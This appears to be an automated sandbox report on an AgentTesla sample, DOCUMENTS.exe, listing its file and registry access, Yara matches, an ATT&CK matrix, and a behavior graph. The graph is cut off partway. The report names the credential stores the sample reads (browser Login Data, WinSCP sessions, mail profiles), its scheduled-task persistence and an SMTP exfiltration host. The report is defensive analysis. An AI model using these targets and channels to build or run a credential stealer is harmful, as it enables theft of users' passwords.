                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeQueries volume information: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 1.2.DOCUMENTS.exe.4ab9de8.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.bgURAojpNNIb.exe.3bd6948.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DOCUMENTS.exe.4a7f3c8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.bgURAojpNNIb.exe.3b9bf28.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.bgURAojpNNIb.exe.3bd6948.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DOCUMENTS.exe.4ab9de8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.bgURAojpNNIb.exe.3b9bf28.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DOCUMENTS.exe.4a7f3c8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000D.00000002.1395584296.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2533846228.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.1395584296.00000000030A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.1393894903.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2533846228.0000000002B26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1418243148.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2533846228.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1359470128.0000000004A7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.1395584296.0000000003051000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DOCUMENTS.exe PID: 7304, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 8044, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: bgURAojpNNIb.exe PID: 8136, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 736, type: MEMORYSTR
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 1.2.DOCUMENTS.exe.4ab9de8.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.bgURAojpNNIb.exe.3bd6948.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DOCUMENTS.exe.4a7f3c8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.bgURAojpNNIb.exe.3b9bf28.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.bgURAojpNNIb.exe.3bd6948.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DOCUMENTS.exe.4ab9de8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.bgURAojpNNIb.exe.3b9bf28.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DOCUMENTS.exe.4a7f3c8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000D.00000002.1393894903.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1418243148.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2533846228.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1359470128.0000000004A7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.1395584296.0000000003051000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DOCUMENTS.exe PID: 7304, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 8044, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: bgURAojpNNIb.exe PID: 8136, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 736, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 1.2.DOCUMENTS.exe.4ab9de8.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.bgURAojpNNIb.exe.3bd6948.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DOCUMENTS.exe.4a7f3c8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.bgURAojpNNIb.exe.3b9bf28.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.bgURAojpNNIb.exe.3bd6948.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DOCUMENTS.exe.4ab9de8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.bgURAojpNNIb.exe.3b9bf28.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DOCUMENTS.exe.4a7f3c8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000D.00000002.1395584296.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2533846228.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.1395584296.00000000030A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.1393894903.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2533846228.0000000002B26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1418243148.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2533846228.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1359470128.0000000004A7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.1395584296.0000000003051000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DOCUMENTS.exe PID: 7304, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 8044, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: bgURAojpNNIb.exe PID: 8136, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 736, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		11
                      Disable or Modify Tools                      		1
                      OS Credential Dumping                      		2
                      File and Directory Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Scheduled Task/Job                      		1
                      Scheduled Task/Job                      		311
                      Process Injection                      		1
                      Deobfuscate/Decode Files or Information                      		1
                      Input Capture                      		24
                      System Information Discovery                      		Remote Desktop Protocol1
                      Data from Local System                      		1
                      Non-Standard Port                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      Scheduled Task/Job                      		3
                      Obfuscated Files or Information                      		1
                      Credentials in Registry                      		221
                      Security Software Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		1
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                      Software Packing                      		NTDS1
                      Process Discovery                      		Distributed Component Object Model1
                      Input Capture                      		11
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets141
                      Virtualization/Sandbox Evasion                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Masquerading                      		Cached Domain Credentials1
                      Application Window Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                      Virtualization/Sandbox Evasion                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
                      Process Injection                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1427366 Sample: DOCUMENTS.exe Startdate: 17/04/2024 Architecture: WINDOWS Score: 100 42 mail.thelamalab.com 2->42 46 Snort IDS alert for network traffic 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 Antivirus / Scanner detection for submitted sample 2->50 52 10 other signatures 2->52 8 DOCUMENTS.exe 7 2->8         started        12 bgURAojpNNIb.exe 5 2->12         started        signatures3 process4 file5 38 C:\Users\user\AppData\...\bgURAojpNNIb.exe, PE32 8->38 dropped 40 C:\Users\user\AppData\Local\...\tmp1DED.tmp, XML 8->40 dropped 54 Uses schtasks.exe or at.exe to add and modify task schedules 8->54 56 Writes to foreign memory regions 8->56 58 Allocates memory in foreign processes 8->58 66 2 other signatures 8->66 14 RegSvcs.exe 2 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        26 2 other processes 8->26 60 Antivirus detection for dropped file 12->60 62 Multi AV Scanner detection for dropped file 12->62 64 Machine Learning detection for dropped file 12->64 22 RegSvcs.exe 12->22         started        24 schtasks.exe 12->24         started        signatures6 process7 dnsIp8 44 mail.thelamalab.com 162.222.226.100, 49708, 49710, 587 PUBLIC-DOMAIN-REGISTRYUS United States 14->44 68 Loading BitLocker PowerShell Module 18->68 28 conhost.exe 18->28         started        30 WmiPrvSE.exe 18->30         started        32 conhost.exe 20->32         started        70 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 22->70 72 Tries to steal Mail credentials (via file / registry access) 22->72 74 